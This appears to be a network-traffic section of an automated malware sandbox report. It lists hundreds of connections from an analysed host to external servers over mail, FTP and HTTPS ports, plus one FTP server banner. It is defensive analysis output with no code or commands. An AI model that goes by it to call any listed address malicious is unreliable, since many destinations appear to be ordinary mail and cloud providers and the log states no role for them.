Source: global trafficTCP traffic: 192.168.2.4:63557 -> 81.169.145.74:222
Source: global trafficTCP traffic: 192.168.2.4:63560 -> 185.183.156.218:2525
Source: global trafficTCP traffic: 192.168.2.4:63731 -> 35.214.252.247:143
Source: global trafficTCP traffic: 192.168.2.4:65466 -> 202.226.37.158:990
Source: global trafficTCP traffic: 192.168.2.4:49821 -> 92.62.143.50:222
Source: global trafficTCP traffic: 192.168.2.4:50615 -> 184.106.54.2:995
Source: global trafficTCP traffic: 192.168.2.4:50774 -> 198.23.53.42:995
Source: global trafficTCP traffic: 192.168.2.4:50885 -> 54.83.33.36:222
Source: global trafficTCP traffic: 192.168.2.4:51239 -> 13.234.155.54:990
Source: global trafficTCP traffic: 192.168.2.4:51240 -> 3.33.130.190:222
Source: global trafficTCP traffic: 192.168.2.4:51374 -> 74.208.5.21:995
Source: global trafficTCP traffic: 192.168.2.4:51386 -> 15.197.142.173:222
Source: global trafficTCP traffic: 192.168.2.4:51389 -> 44.219.53.183:222
Source: global trafficTCP traffic: 192.168.2.4:51427 -> 15.236.29.106:222
Source: global trafficTCP traffic: 192.168.2.4:51550 -> 104.21.63.202:222
Source: global trafficTCP traffic: 192.168.2.4:51884 -> 76.223.105.230:222
Source: global trafficTCP traffic: 192.168.2.4:52106 -> 185.230.63.107:990
Source: global trafficTCP traffic: 192.168.2.4:52350 -> 185.230.63.171:990
Source: global trafficTCP traffic: 192.168.2.4:52410 -> 104.47.71.202:587
Source: global trafficTCP traffic: 192.168.2.4:53073 -> 185.230.63.186:990
Source: global trafficTCP traffic: 192.168.2.4:53085 -> 104.26.12.245:990
Source: global trafficTCP traffic: 192.168.2.4:53125 -> 108.166.43.2:995
Source: global trafficTCP traffic: 192.168.2.4:55500 -> 159.203.32.4:222
Source: global trafficTCP traffic: 192.168.2.4:55585 -> 47.246.24.211:222
Source: global trafficTCP traffic: 192.168.2.4:55637 -> 18.229.0.171:222
Source: global trafficTCP traffic: 192.168.2.4:55642 -> 68.168.209.252:222
Source: global trafficTCP traffic: 192.168.2.4:55661 -> 103.224.212.226:222
Source: global trafficTCP traffic: 192.168.2.4:55662 -> 34.208.26.152:990
Source: global trafficTCP traffic: 192.168.2.4:55670 -> 193.227.5.222:222
Source: global trafficTCP traffic: 192.168.2.4:55676 -> 23.185.0.1:990
Source: global trafficTCP traffic: 192.168.2.4:55699 -> 185.135.132.105:222
Source: global trafficTCP traffic: 192.168.2.4:55713 -> 66.235.200.147:222
Source: global trafficTCP traffic: 192.168.2.4:55716 -> 199.34.228.177:222
Source: global trafficTCP traffic: 192.168.2.4:55751 -> 99.81.150.60:222
Source: global trafficTCP traffic: 192.168.2.4:55759 -> 164.52.221.51:222
Source: global trafficTCP traffic: 192.168.2.4:55784 -> 185.154.212.10:990
Source: global trafficTCP traffic: 192.168.2.4:55788 -> 95.168.220.210:990
Source: global trafficTCP traffic: 192.168.2.4:55806 -> 162.210.96.117:222
Source: global trafficTCP traffic: 192.168.2.4:55827 -> 162.144.64.233:222
Source: global trafficTCP traffic: 192.168.2.4:55828 -> 34.136.104.255:222
Source: global trafficTCP traffic: 192.168.2.4:55834 -> 52.206.191.232:990
Source: global trafficTCP traffic: 192.168.2.4:55838 -> 67.205.16.72:990
Source: global trafficTCP traffic: 192.168.2.4:55844 -> 15.235.14.141:222
Source: global trafficTCP traffic: 192.168.2.4:55847 -> 35.164.64.246:990
Source: global trafficTCP traffic: 192.168.2.4:55852 -> 37.157.195.144:222
Source: global trafficTCP traffic: 192.168.2.4:55873 -> 213.0.13.44:990
Source: global trafficTCP traffic: 192.168.2.4:56072 -> 116.202.203.176:222
Source: global trafficTCP traffic: 192.168.2.4:56073 -> 3.234.162.143:222
Source: global trafficTCP traffic: 192.168.2.4:56074 -> 75.118.8.65:222
Source: global trafficTCP traffic: 192.168.2.4:56076 -> 35.237.190.156:222
Source: global trafficTCP traffic: 192.168.2.4:56083 -> 120.88.73.238:990
Source: global trafficTCP traffic: 192.168.2.4:56091 -> 144.202.62.131:222
Source: global trafficTCP traffic: 192.168.2.4:56206 -> 104.47.71.138:587
Source: global trafficTCP traffic: 192.168.2.4:56811 -> 3.111.240.6:222
Source: global trafficTCP traffic: 192.168.2.4:56901 -> 15.197.148.33:222
Source: global trafficTCP traffic: 192.168.2.4:56910 -> 3.33.152.147:222
Source: global trafficTCP traffic: 192.168.2.4:56917 -> 104.21.12.154:990
Source: global trafficTCP traffic: 192.168.2.4:56934 -> 15.236.187.69:222
Source: global trafficTCP traffic: 192.168.2.4:56935 -> 35.154.156.7:990
Source: global trafficTCP traffic: 192.168.2.4:56944 -> 13.248.243.5:990
Source: global trafficTCP traffic: 192.168.2.4:57467 -> 104.26.13.245:222
Source: global trafficTCP traffic: 192.168.2.4:58234 -> 148.66.138.193:990
Source: global trafficTCP traffic: 192.168.2.4:58455 -> 162.250.126.5:222
Source: unknownNetwork traffic detected: IP country count 20
Source: global trafficTCP traffic: 192.168.2.4:56040 -> 142.250.27.27:587
Source: global trafficTCP traffic: 192.168.2.4:56043 -> 185.183.156.218:25
Source: global trafficTCP traffic: 192.168.2.4:56095 -> 177.153.23.241:25
Source: global trafficTCP traffic: 192.168.2.4:57188 -> 162.159.205.25:587
Source: global trafficTCP traffic: 192.168.2.4:60245 -> 146.20.161.1:587
Source: global trafficTCP traffic: 192.168.2.4:60247 -> 66.45.228.7:587
Source: global trafficTCP traffic: 192.168.2.4:60248 -> 74.208.5.3:587
Source: global trafficTCP traffic: 192.168.2.4:62162 -> 80.92.66.174:587
Source: global trafficTCP traffic: 192.168.2.4:62971 -> 173.203.187.1:587
Source: global trafficTCP traffic: 192.168.2.4:63075 -> 104.200.30.31:587
Source: global trafficTCP traffic: 192.168.2.4:63511 -> 103.224.212.34:587
Source: global trafficTCP traffic: 192.168.2.4:63514 -> 142.93.233.86:587
Source: global trafficTCP traffic: 192.168.2.4:64230 -> 198.23.53.39:587
Source: global trafficTCP traffic: 192.168.2.4:64407 -> 15.236.236.160:587
Source: global trafficTCP traffic: 192.168.2.4:51236 -> 212.159.8.200:587
Source: global trafficTCP traffic: 192.168.2.4:51263 -> 67.195.204.83:587
Source: global trafficTCP traffic: 192.168.2.4:51497 -> 104.47.73.138:587
Source: global trafficTCP traffic: 192.168.2.4:51507 -> 104.47.75.164:587
Source: global trafficTCP traffic: 192.168.2.4:51910 -> 3.94.41.167:587
Source: global trafficTCP traffic: 192.168.2.4:51936 -> 162.159.205.11:587
Source: global trafficTCP traffic: 192.168.2.4:52124 -> 104.47.73.10:587
Source: global trafficTCP traffic: 192.168.2.4:52132 -> 104.47.55.138:587
Source: global trafficTCP traffic: 192.168.2.4:52245 -> 104.47.17.74:587
Source: global trafficTCP traffic: 192.168.2.4:52330 -> 144.76.107.16:587
Source: global trafficTCP traffic: 192.168.2.4:52410 -> 104.47.71.202:587
Source: global trafficTCP traffic: 192.168.2.4:52440 -> 78.128.62.90:587
Source: global trafficTCP traffic: 192.168.2.4:52492 -> 77.75.77.146:587
Source: global trafficTCP traffic: 192.168.2.4:52850 -> 212.97.32.100:587
Source: global trafficTCP traffic: 192.168.2.4:52866 -> 15.222.16.211:587
Source: global trafficTCP traffic: 192.168.2.4:52870 -> 66.81.203.8:587
Source: global trafficTCP traffic: 192.168.2.4:52890 -> 216.69.141.82:587
Source: global trafficTCP traffic: 192.168.2.4:53262 -> 18.185.115.147:587
Source: global trafficTCP traffic: 192.168.2.4:55741 -> 209.85.202.27:587
Source: global trafficTCP traffic: 192.168.2.4:55745 -> 142.250.153.14:587
Source: global trafficTCP traffic: 192.168.2.4:55757 -> 142.251.16.27:587
Source: global trafficTCP traffic: 192.168.2.4:55770 -> 136.143.191.44:587
Source: global trafficTCP traffic: 192.168.2.4:55774 -> 142.250.153.27:587
Source: global trafficTCP traffic: 192.168.2.4:55776 -> 143.244.202.96:587
Source: global trafficTCP traffic: 192.168.2.4:55802 -> 162.241.224.218:587
Source: global trafficTCP traffic: 192.168.2.4:55893 -> 162.241.62.220:587
Source: global trafficTCP traffic: 192.168.2.4:55904 -> 74.220.219.189:587
Source: global trafficTCP traffic: 192.168.2.4:55911 -> 164.90.197.105:587
Source: global trafficTCP traffic: 192.168.2.4:55913 -> 62.146.106.50:587
Source: global trafficTCP traffic: 192.168.2.4:55927 -> 142.250.153.26:587
Source: global trafficTCP traffic: 192.168.2.4:55934 -> 162.241.24.104:587
Source: global trafficTCP traffic: 192.168.2.4:55937 -> 209.85.202.26:587
Source: global trafficTCP traffic: 192.168.2.4:55943 -> 64.233.184.26:587
Source: global trafficTCP traffic: 192.168.2.4:55951 -> 200.55.156.172:587
Source: global trafficTCP traffic: 192.168.2.4:55974 -> 193.203.239.23:587
Source: global trafficTCP traffic: 192.168.2.4:55989 -> 72.167.58.161:587
Source: global trafficTCP traffic: 192.168.2.4:56019 -> 133.130.97.143:587
Source: global trafficTCP traffic: 192.168.2.4:56058 -> 95.168.220.222:587
Source: global trafficTCP traffic: 192.168.2.4:56064 -> 191.6.220.39:587
Source: global trafficTCP traffic: 192.168.2.4:56101 -> 52.101.42.6:587
Source: global trafficTCP traffic: 192.168.2.4:56127 -> 52.101.42.4:587
Source: global trafficTCP traffic: 192.168.2.4:56139 -> 104.47.74.10:587
Source: global trafficTCP traffic: 192.168.2.4:56146 -> 52.101.11.7:587
Source: global trafficTCP traffic: 192.168.2.4:56149 -> 52.101.9.0:587
Source: global trafficTCP traffic: 192.168.2.4:56157 -> 52.101.11.2:587
Source: global trafficTCP traffic: 192.168.2.4:56161 -> 104.47.59.138:587
Source: global trafficTCP traffic: 192.168.2.4:56166 -> 52.101.73.1:587
Source: global trafficTCP traffic: 192.168.2.4:56170 -> 52.101.137.0:587
Source: global trafficTCP traffic: 192.168.2.4:56171 -> 52.101.9.11:587
Source: global trafficTCP traffic: 192.168.2.4:56181 -> 52.101.73.11:587
Source: global trafficTCP traffic: 192.168.2.4:56184 -> 52.101.9.17:587
Source: global trafficTCP traffic: 192.168.2.4:56189 -> 52.101.73.6:587
Source: global trafficTCP traffic: 192.168.2.4:56193 -> 52.101.132.30:587
Source: global trafficTCP traffic: 192.168.2.4:56206 -> 104.47.71.138:587
Source: global trafficTCP traffic: 192.168.2.4:56214 -> 52.101.40.4:587
Source: global trafficTCP traffic: 192.168.2.4:56634 -> 212.159.9.200:587
Source: global trafficTCP traffic: 192.168.2.4:56900 -> 162.159.205.17:587
Source: global trafficTCP traffic: 192.168.2.4:56920 -> 68.178.213.244:587
Source: global trafficTCP traffic: 192.168.2.4:56926 -> 67.195.228.75:587
Source: global trafficTCP traffic: 192.168.2.4:56928 -> 66.81.203.198:587
Source: global trafficTCP traffic: 192.168.2.4:56955 -> 18.185.115.145:587
Source: global trafficTCP traffic: 192.168.2.4:56959 -> 104.47.75.228:587
Source: global trafficTCP traffic: 192.168.2.4:56962 -> 52.101.9.2:587
Source: global trafficTCP traffic: 192.168.2.4:56974 -> 52.86.6.113:587
Source: global trafficTCP traffic: 192.168.2.4:56986 -> 52.101.9.5:587
Source: global trafficTCP traffic: 192.168.2.4:56990 -> 52.101.132.28:587
Source: global trafficTCP traffic: 192.168.2.4:56997 -> 52.101.40.6:587
Source: global trafficTCP traffic: 192.168.2.4:57008 -> 52.101.40.1:587
Source: global trafficTCP traffic: 192.168.2.4:57020 -> 52.101.11.9:587
Source: global trafficTCP traffic: 192.168.2.4:57044 -> 104.47.17.138:587
Source: global trafficTCP traffic: 192.168.2.4:57476 -> 68.178.213.243:587
Source: global trafficTCP traffic: 192.168.2.4:57479 -> 66.81.203.133:587
Source: global trafficTCP traffic: 192.168.2.4:57574 -> 18.185.115.146:587
Source: global trafficTCP traffic: 192.168.2.4:57599 -> 52.101.8.46:587
Source: global trafficTCP traffic: 192.168.2.4:57619 -> 52.101.11.3:587
Source: global trafficTCP traffic: 192.168.2.4:57631 -> 52.101.137.2:587
Source: global trafficTCP traffic: 192.168.2.4:57634 -> 52.101.68.36:587
Source: global trafficTCP traffic: 192.168.2.4:57658 -> 52.101.42.13:587
Source: global trafficTCP traffic: 192.168.2.4:57702 -> 52.101.8.42:587
Source: global trafficTCP traffic: 192.168.2.4:58013 -> 52.101.8.34:587
Source: global trafficTCP traffic: 192.168.2.4:58068 -> 52.101.40.2:587
Source: global trafficTCP traffic: 192.168.2.4:58087 -> 52.101.8.36:587
Source: global trafficTCP traffic: 192.168.2.4:58219 -> 52.101.73.26:587
Source: global trafficTCP traffic: 192.168.2.4:58233 -> 52.101.8.44:587
Source: global trafficTCP traffic: 192.168.2.4:58238 -> 52.101.73.30:587
Source: global trafficTCP traffic: 192.168.2.4:58258 -> 52.101.68.32:587
Source: global trafficTCP traffic: 192.168.2.4:58343 -> 52.101.40.24:587
Source: global trafficTCP traffic: 192.168.2.4:58346 -> 52.101.68.0:587
Source: global trafficTCP traffic: 192.168.2.4:58470 -> 52.101.68.16:587
Source: global trafficTCP traffic: 192.168.2.4:58536 -> 52.101.68.18:587
Source: unknownFTP traffic detected: 3.234.162.143:21 -> 192.168.2.4:50230 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 200 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 200 allowed.220-Local time is now 05:59. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 200 allowed.220-Local time is now 05:59. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 200 allowed.220-Local time is now 05:59. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 200 allowed.220-Local time is now 05:59. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Source: unknownNetwork traffic detected: HTTP traffic on port 58375 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50731
Source: unknownNetwork traffic detected: HTTP traffic on port 56194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55269 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61622
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56289
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57373
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58462
Source: unknownNetwork traffic detected: HTTP traffic on port 61946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50498 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56280
Source: unknownNetwork traffic detected: HTTP traffic on port 58490 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61620
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61621
Source: unknownNetwork traffic detected: HTTP traffic on port 57117 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50985
Source: unknownNetwork traffic detected: HTTP traffic on port 55337 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65117 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53236 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58227
Source: unknownNetwork traffic detected: HTTP traffic on port 56307 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61633
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57144
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61635
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61636
Source: unknownNetwork traffic detected: HTTP traffic on port 52426 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57389
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56294
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56295
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61639
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56296
Source: unknownNetwork traffic detected: HTTP traffic on port 52072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56290
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56292
Source: unknownNetwork traffic detected: HTTP traffic on port 59345 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55510 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55235 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50997
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50999
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51602
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57148
Source: unknownNetwork traffic detected: HTTP traffic on port 58421 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56320 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56066
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57155
Source: unknownNetwork traffic detected: HTTP traffic on port 59197 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57025 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57541 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60140 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61640
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50766
Source: unknownNetwork traffic detected: HTTP traffic on port 58328 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64237 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58684 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59345
Source: unknownNetwork traffic detected: HTTP traffic on port 52506 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59341
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62748
Source: unknownNetwork traffic detected: HTTP traffic on port 49508 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62749
Source: unknownNetwork traffic detected: HTTP traffic on port 65072 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52152 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58490
Source: unknownNetwork traffic detected: HTTP traffic on port 61660 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61650
Source: unknownNetwork traffic detected: HTTP traffic on port 64089 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57161
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61651
Source: unknownNetwork traffic detected: HTTP traffic on port 55292 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52336 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50933
Source: unknownNetwork traffic detected: HTTP traffic on port 65497 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63476 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61828
Source: unknownNetwork traffic detected: HTTP traffic on port 61635 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59748
Source: unknownNetwork traffic detected: HTTP traffic on port 51673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56235
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56237
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56479
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58421
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56484
Source: unknownNetwork traffic detected: HTTP traffic on port 51799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59993
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62910
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57332
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58661
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56241
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57330
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57572
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60737
Source: unknownNetwork traffic detected: HTTP traffic on port 57543 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56409 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55362 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58112 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55454 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51286 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58017 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56254
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55166
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55160
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57581
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62925
Source: unknownNetwork traffic detected: HTTP traffic on port 56618 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56010
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50955
Source: unknownNetwork traffic detected: HTTP traffic on port 56801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50956
Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61608
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56258
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50951
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50950
Source: unknownNetwork traffic detected: HTTP traffic on port 55245 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58091 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56264
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58684
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55178
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61604
Source: unknownNetwork traffic detected: HTTP traffic on port 61613 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55174
Source: unknownNetwork traffic detected: HTTP traffic on port 55305 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56296 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65309 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49519
Source: unknownNetwork traffic detected: HTTP traffic on port 51386 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 62834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49517
Source: unknownNetwork traffic detected: HTTP traffic on port 61944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50964
Source: unknownNetwork traffic detected: HTTP traffic on port 51330 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64388 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49461 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52142 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57310 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55509 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58207
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57117
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57122
Source: unknownNetwork traffic detected: HTTP traffic on port 56432 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61613
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62944
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56271
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56272
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49508
Source: unknownNetwork traffic detected: HTTP traffic on port 53224 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55181
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49504
Source: unknownNetwork traffic detected: HTTP traffic on port 51631 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51428
Source: unknownNetwork traffic detected: HTTP traffic on port 51115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65493 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58629 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53607
Source: unknownNetwork traffic detected: HTTP traffic on port 57825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50570
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50331
Source: unknownNetwork traffic detected: HTTP traffic on port 56884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50333
Source: unknownNetwork traffic detected: HTTP traffic on port 61639 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 58314 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56454 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64115 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56099 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51070 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 61640 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59044 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61460
Source: unknownNetwork traffic detected: HTTP traffic on port 50999 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63645
Source: unknownNetwork traffic detected: HTTP traffic on port 50826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56500 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57304 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56254 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51673
Source: unknownNetwork traffic detected: HTTP traffic on port 64229 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52453 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51675
Source: unknownNetwork traffic detected: HTTP traffic on port 57660 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55409 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60140
Source: unknownNetwork traffic detected: HTTP traffic on port 65441 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61230
Source: unknownNetwork traffic detected: HTTP traffic on port 51350 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56356 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64041 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51276 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51448
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52530
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50350
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51203
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52534
Source: unknownNetwork traffic detected: HTTP traffic on port 56711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59179
Source: unknownNetwork traffic detected: HTTP traffic on port 56346 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52780
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58082
Source: unknownNetwork traffic detected: HTTP traffic on port 56391 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58084
Source: unknownNetwork traffic detected: HTTP traffic on port 58848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64149 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49310
